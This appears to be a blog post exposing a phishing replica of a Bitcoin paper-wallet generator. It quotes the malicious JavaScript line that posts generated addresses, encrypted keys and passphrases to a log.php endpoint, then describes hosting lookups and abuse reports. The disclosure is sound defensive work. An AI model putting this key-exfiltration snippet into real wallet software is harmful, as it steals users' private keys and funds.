The website on walletgenerator.org is a modified version (phishing replica) of walletgenerator.net.

The phishing site is stealing the private keys and the pass-phrases.

Look in the code for lines like these:

var http = new XMLHttpRequest(); http.open("POST", "log.php", true); http.send(generatedAddress + "," + Bitcoin.Base58.encode(encryptedKey) + "-" + document.currentBipPassphrase + "," + janin.selectedCurrency.name);

Also, on the phishing website the security warning is missing:

You appear to be running this generator off of a live website, which is not recommended for creating valuable wallets. Instead, use the download link at the bottom of this page to download the ZIP file from GitHub and run this generator offline as a 'local' HTML file.

The phishing wallet generator:

The original:

Some differences in the code (shown with meld):

I copied the code on pastebin in case someone wants to study it: https://pastebin.com/wmvZuSND

It looks like it's hosted by Sourceway.de. I notified them.

valentin@computer:~$ ping walletgenerator.org -c 1 PING walletgenerator.org (5.189.157.67) 56(84) bytes of data. 64 bytes from web.sourceway.de (5.189.157.67): icmp_seq=1 ttl=61 time=46.8 ms --- walletgenerator.org ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 46.895/46.895/46.895/0.000 ms valentin@computer:~$

valentin@computer:~$ ping web.sourceway.de -c 1 PING web.sourceway.de (5.189.157.67) 56(84) bytes of data. 64 bytes from web.sourceway.de (5.189.157.67): icmp_seq=1 ttl=61 time=46.6 ms --- web.sourceway.de ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 46.655/46.655/46.655/0.000 ms

Also, I sent email to the Registrar's abuse email address.

valentin@computer:~$ whois cronon.net | grep abuse Registrar Abuse Contact Email: abuse-domains@cronon.net valentin@computer:~$

I got this response from the web hosting provider: Stealing Bitcoin "is nothing illegal, but morally wrong" - WTF?

Update

$ resolveip walletgenerator.org IP address of walletgenerator.org is 176.123.0.55 $ whois 176.123.0.55 | grep -i abuse % Abuse contact for '176.123.0.0 - 176.123.31.255' is 'noc@alexhost.com' abuse-c: AR18916-RIPE

It still works (10 April 2018), the web hosting is changed: